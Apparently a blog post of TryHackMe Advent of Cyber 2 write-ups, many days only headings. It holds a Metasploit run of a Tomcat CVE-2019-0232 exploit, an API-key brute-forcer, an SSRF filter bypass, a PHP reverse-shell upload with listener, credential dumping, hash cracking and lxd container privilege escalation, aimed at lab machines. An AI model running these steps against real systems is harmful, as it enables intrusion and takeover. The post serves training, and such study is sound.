TryHackMe – Advent of Cyber 2

Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks 🎄

Day 1: #Web #Cookies A Christmas Crisis

Day 2: #Web #RCE The Elf Strikes Back

Day 3: #Web #Authentication Christmas Chaos

Day 4: #Web #Fuzzing Santa's Watching

Day 5: #Web #SQLi Someone stole Santa's gift list!

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap 1

pcap 2

pcap 3

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

Day 9: #Networking #ftp Anyone can be Santa!

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on the SMB server
enum4linux -S $IP – enumerate shares on the SMB server
smbclient //$IP/$ShareName – connect to an SMB share

Day 11: #Networking #privesc The Rogue Gnome

Day 12: #Networking #initialaccess Ready, Set, Elf

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set TARGETURI $remotehostCGI
check
exploit
shell

The above gets us a user-level shell. To check what privileges that user has, drop back to the Meterpreter session (exit the cmd shell first) and run post/windows/gather/win_privs.

Day 13: #exploitation Coal for Christmas

Day 14: #osint Where's Rudolph?

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The API endpoint takes a numeric key in the URL path. We know the key is odd
# but not its value; the correct key returns a flag. Walk the odd numbers 1..99
# (range(1, 100, 2)) and print any response that is not an error or a
# "PROTECTION" (rate-limit / lockout) message.

BASE_URL = "http://EDITME_THMIP:8000/api"  # replace EDITME_THMIP with the target IP


def brute_force_key(base_url=BASE_URL):
    hits = []
    for api_key in range(1, 100, 2):
        print(f"api_key {api_key}")  # show which key we are trying
        r = requests.get(f"{base_url}/{api_key}")
        # only print the body if there are no failures or protections in place
        if "Error" not in r.text and "PROTECTION" not in r.text:
            print(r.text)
            hits.append((api_key, r.text))
    return hits


if __name__ == "__main__":
    brute_force_key()

Day 19: #SSRF #web The Naughty or Nice List

  1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name= (the backend URL is passed in a request parameter, so we control where the server makes its request).
  2. Since an internal server is reachable through that parameter, there are several things to try:
    • visit the root of the exposed host, e.g. http://list.hohoho:8080, via the proxied URL parameter.
    • try other ports on the same host to enumerate internal services.
    • check for any app-side blocking/filtering, e.g. requesting localhost via the proxy. If that is blocked, use a public hostname that resolves to 127.0.0.1 such as localtest.me, e.g. proxy=http://list.hohoho.localtest.me (the filter compares the hostname string, not where it resolves).
    • any of these can lead to sensitive internal data being exposed.
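Why the localtest.me trick works, as an added example that is not part of the original writeup or the room: a blocklist that compares the hostname string against "localhost"/"127.0.0.1" is bypassed by any name that resolves to loopback, whereas a filter that resolves the name first and rejects non-public addresses catches it. The resolver table below is constructed so the example runs offline (the addresses for list.hohoho and example.com are assumed; *.localtest.me really does resolve to 127.0.0.1).

```python
# Added example: hostname-blocklist SSRF filter vs. resolve-then-check filter.
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example needs no network.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "list.hohoho": ["10.10.0.5"],               # internal app server (assumed address)
    "list.hohoho.localtest.me": ["127.0.0.1"],  # public wildcard name pointing at loopback
    "example.com": ["93.184.216.34"],           # assumed public address
}

BLOCKED_HOSTS = {"localhost", "127.0.0.1"}


def naive_filter_allows(url):
    """The kind of check that blocks 'localhost' but is bypassed by a DNS alias."""
    host = urlsplit(url).hostname or ""
    return host not in BLOCKED_HOSTS


def resolve_then_check_allows(url, resolver=FAKE_DNS, allowed_schemes=("http", "https")):
    """Hardened check: resolve the host and reject if ANY address is non-global.

    `resolver` maps hostname -> list of address strings (injected for testing;
    in production this would be a real DNS lookup such as socket.getaddrinfo).
    """
    parts = urlsplit(url)
    if parts.scheme not in allowed_schemes:
        return False
    host = parts.hostname
    if host is None:
        return False
    try:
        addrs = [ipaddress.ip_address(host)]  # URL carried a literal IP
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver.get(host, [])]
    if not addrs:
        return False  # unresolvable: fail closed
    # is_global is False for loopback, link-local, RFC 1918, 0.0.0.0/8, etc.
    return all(a.is_global for a in addrs)


if __name__ == "__main__":
    for u in ("http://localhost/", "http://list.hohoho.localtest.me/search.php?name=x",
              "http://list.hohoho:8080/search.php", "http://example.com/"):
        print(f"{u:55} naive={naive_filter_allows(u)!s:5} resolved={resolve_then_check_allows(u)}")
```

Even the resolve-then-check version is only sound if the outgoing request connects to the address that was checked (otherwise DNS rebinding between check and use reopens the hole) and if redirects are not followed blindly.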

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 (debug mode) – r2 -d <file>
Analysing a binary – aa
List of functions – afl
Print disassembly of a function – pdf @<function>
Set a breakpoint – db <reference>
Run program until breakpoint – dc
View contents of a memory address – px @<memory address>
Move to next instruction – ds
View registers (e.g. eax) – dr (dr eax for a single register)
Reload program – ood


For .NET applications, ILSpy and dotPeek are good tools to decompile the assembly back to readable C#, which lets you read the methods that implement a check or authentication step and see how to bypass it.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <path> -File -Hidden -ErrorAction SilentlyContinue (or -Directory instead of -File). This lists only the hidden files (or folders) under the given path; -Hidden returns hidden items only, and -ErrorAction SilentlyContinue suppresses access-denied errors so the listing carries on.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] reads the item at a specific position. Get-Content returns an array of lines, so (Get-Content -Path file.txt)[100] is the 101st line (the index is zero-based). To index by character instead, read the file as a single string with -Raw first.

Select-String -Path ./Desktop/*.txt -Pattern 'needle' searches for a string (regex) inside the txt files on the desktop. Note that Select-String matches file contents, not file names; to find all txt files, use Get-ChildItem with -Recurse -Filter *.txt.

Day 21: #forensics #powershell Time for some ELForensics

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a PHP reverse shell. Simply renaming it to .jpg.php doesn't get past the check. Looking at the page's network requests shows a filter.js being loaded: block that script and the client-side filter is gone, and nothing server-side rejects the upload. Set up the reverse shell listener, then browse to the uploaded file to trigger the shell.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ mysql -u tron -p
mysql> show databases;
mysql> use tron;
mysql> show tables;
mysql> select * from users;

We find the user flynn's hashed password, which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flynn user is in the lxd group, which lets us interact with Linux containers (lxc) and, because lxd runs as root, build a privileged container with the host filesystem mounted inside it.
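What a lookup service like crackstation does for an unsalted hash, reproduced locally as an added example (not part of the original writeup). The digest length picks the candidate algorithm, and every wordlist entry is hashed and compared. The target hash and wordlist below are constructed for this example (md5 of "password"); the real hash from the tron database is not reproduced here.

```python
# Added example: offline dictionary attack on an unsalted, single-round hash.
import hashlib

# Digest length in hex characters -> candidate unsalted algorithms
HASH_BY_LENGTH = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}


def candidate_algorithms(hash_hex):
    """Guess the algorithm from the hex digest length (assumes no salt, one round)."""
    return HASH_BY_LENGTH.get(len(hash_hex.strip()), [])


def crack_unsalted(hash_hex, wordlist):
    """Return (algorithm, plaintext) for the first wordlist entry matching hash_hex, else None."""
    target = hash_hex.strip().lower()
    algos = candidate_algorithms(target)
    for word in wordlist:
        for algo in algos:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return algo, word
    return None


# Constructed wordlist and target for the example: md5("password").
WORDLIST = ["letmein", "christmas", "password", "flynn2020"]
TARGET = "5f4dcc3b5aa765d61d8327deb882cf99"

if __name__ == "__main__":
    print(crack_unsalted(TARGET, WORDLIST))  # ('md5', 'password')
```

This is exactly why storing passwords as plain MD5/SHA-1 is a finding: a short wordlist (or a precomputed lookup table) recovers them instantly. A per-user salt defeats precomputed tables, and a slow hash such as bcrypt or Argon2 makes even the wordlist loop expensive.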

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell; the host's root filesystem is now at /mnt/root, writable as root